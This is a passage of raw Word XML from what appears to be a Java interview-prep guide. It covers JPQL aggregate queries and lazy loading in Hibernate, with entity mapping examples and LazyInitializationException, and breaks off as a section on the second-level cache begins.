        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33542716"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Query("SELECT AVG(e.salary) FROM Employee e")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6C3D6D"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Double findAverageSalary();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597D5A0C" w14:textId="77777777" w:rsidR="00C2152E" w:rsidRPr="007F3379" w:rsidRDefault="00C2152E" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38F45F9E"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Query("SELECT MAX(e.salary) FROM Employee e")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12050166"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Double findMaxSalary();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65136717"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3466D0AC"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Query("SELECT e FROM Employee e WHERE e.hireDate = CURRENT_DATE")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67601EDD"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ist&lt;Employee&gt; findEmployeesHiredToday();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8CEFF4"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DE6484" w14:textId="77777777" w:rsidR="00C2152E" w:rsidRPr="007F3379" w:rsidRDefault="00C2152E"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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C305FA" w14:textId="77777777" w:rsidR="00C2152E" w:rsidRPr="007F3379" w:rsidRDefault="00C2152E"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JPA provides several built-in functions to perform common database operations directly within JPQL queries. These functions, such as COUNT(), MAX(), MIN(), AVG(), SUM(), and more, allow you to manipulate and retrieve data efficiently without writing additional Java code. These functions are powerful for aggregation, string manipulation, and working with dates or null values in your database queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4482E931" w14:textId="6844C6DD" w:rsidR="00C97E60" w:rsidRPr="00CE4B95"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7A7B7D9">
          <v:rect id="_x0000_i2462" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4D1318" w14:textId="3D898288" w:rsidR="00E74B00" w:rsidRPr="00CE4B95" w:rsidRDefault="003E54BC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="557" w:name="_Toc196308037"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is lazy loading in hibernate</w:t>
      </w:r>
      <w:r w:rsidR="00E74B00" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="557"/>
    </w:p>
    <w:p w14:paraId="4CB3B9D1" w14:textId="6CE542F6" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D" w:rsidP="007F3379">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Lazy loading</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hibernate</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a concept where an association or collection is loaded on-demand, i.e., when it is actually accessed for the first time, rather than being loaded immediately when the parent entity is loaded. This helps improve performance by avoiding the unnecessary retrieval of data from the database until it is actually needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EC644A" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D"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Key Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D02ACB" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2000"/>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Lazy loading</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> helps in deferring the loading of related entities until they are explicitly accessed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6506ABA0" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2000"/>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his can lead to performance optimization by reducing the number of database queries when the related data is not needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF2F8F5" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2000"/>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Hibernate uses proxies or bytecode enhancement to implement lazy loading. A proxy is a placeholder object that will be replaced with the real entity when accessed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4345B50E" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D"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Types of Lazy Loading in Hibernate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643FC30F" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2001"/>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Lazy loading for associations (One-to-One, One-to-Many, Many-to-One, Many-to-Many):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2B02A4" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2001"/>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For example, if you have an Order entity and each Order has a Customer associated with it (many-to-one relationship), the Customer will not be fetched from the database until you explicitly access it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761158DE" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2001"/>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Lazy loading for collections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128B3044" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2001"/>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f an entity has a collection (like List, Set, etc.), the collection will not be loaded until you attempt to access it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C75EAC" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D"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How to enable Lazy Loading in Hibernate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B87A846"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By default, Hibernate uses lazy loading for most relationships unless configured otherwise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4F83B0"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For example, in your entity mapping, you can specify lazy loading using the fetch attribute of @ManyToOne, @OneToMany, @OneToOne, etc., annotations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7BB87F" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0461DDDF"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ntity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39895FB2"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ublic class Order {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66290588" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EC61264"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Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBC53F5"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Long id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16ED9860" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33FB6175"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ManyToOne(fetch = FetchType.LAZY)  // Lazy loading enabled here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD6A363"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JoinColumn(name = "customer_id")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E46FDA8"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Customer customer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447DF710" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F7C0345"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Other fields and methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43963B78"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7574366B"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n the above example, the customer field will only be loaded when it is accessed for the first time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0658A02F" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D"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How it Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1105E18D" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2002"/>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hen you load an Order entity, the associated Customer entity will not be loaded immediately from the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AA93B9" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2002"/>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Instead, a </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>proxy object</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is created, and when you try to access the customer field, the actual database query to load the Customer is triggered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF1EE36" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2002"/>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lastRenderedPageBreak/>
        <w:t>This ensures that the Customer data is loaded only when needed, not when the Order is loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4C4477" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D"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Pros and Cons of Lazy Loading:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEB6192" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D"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Pros:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500AFDCC" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2003"/>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Performance optimization</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It reduces unnecessary database queries, especially when the associated entities are not always needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B75A31" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2003"/>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Better resource usage</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Saves memory and processing time since data is fetched only when required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250BF6E6" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D"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Cons:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570B9B03" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2004"/>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Potential for LazyInitializationException</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the session is closed before the lazy-loaded data is accessed, a LazyInitializationException is thrown because Hibernate cannot load the data outside an active session context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7346AA89"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xample scenario where exception occurs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790951E9"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 session = sessionFactory.openSession();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7598597E"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Order order = session.get(Order.class, 1L);  // Lazy loading triggered later</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AE2EBB"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ssion.close(); // Session is closed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6543B4CA" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="717BA922"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This will throw LazyInitializationException since the session is closed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301471F1"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ustomer customer = order.getCustomer();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B63F64E"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o avoid this, you can either:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ECDA50" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2004"/>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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>eager loading</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (by setting fetch = FetchType.EAGER), which loads the associations immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D800FF1" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2004"/>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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Open Session in View</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pattern, which keeps the session open until the view rendering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F08B6E" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D"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Example of Lazy Loading in Action:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B21F6F7"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ntity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610C532C"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ublic class Customer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DF9920"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0227CF"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Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BDF91B"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Long id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610A5088" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63C0556F"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OneToMany(fetch = FetchType.LAZY, mappedBy = "customer")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649A6FF8"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Set&lt;Order&gt; orders;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C66579" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D2F8768"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Other fields and methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636A8050"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C96D9C" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="557EA667"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ntity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C2A81D"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ublic class Order {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B8538D" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E6A1B2B"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Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A11D62"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Long id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF10D7E" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C9F9341"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ManyToOne(fetch = FetchType.LAZY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E127D0"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JoinColumn(name = "customer_id")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C13281"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Customer customer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BB2D78" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15CC2DB0"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Other fields and methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55016B4A"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327DD21F"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Here, the orders collection in Customer and the customer association in Order are both </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lazily loaded</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF2B9BE" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCC76A1" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D"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Lazy loading</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Hibernate is a technique that optimizes performance by loading related entities or collections only when they are accessed. It is beneficial when you want to avoid loading unnecessary data and improve resource usage, but it requires careful handling to avoid issues like LazyInitializationException.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F2D279" w14:textId="436C5D67" w:rsidR="00C97E60" w:rsidRPr="00CE4B95"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C42A2CD">
          <v:rect id="_x0000_i2463" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="552234E1" w14:textId="75575376" w:rsidR="00B62C20" w:rsidRPr="00CE4B95" w:rsidRDefault="00B911B8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="558" w:name="_Toc196308038"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the second level cache in hibernate</w:t>
      </w:r>
      <w:r w:rsidR="00B62C20" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="558"/>
    </w:p>
    <w:p w14:paraId="335E87F1" w14:textId="71CF769B" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7" w:rsidP="007F3379">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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The </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>second-level cache</w:t>
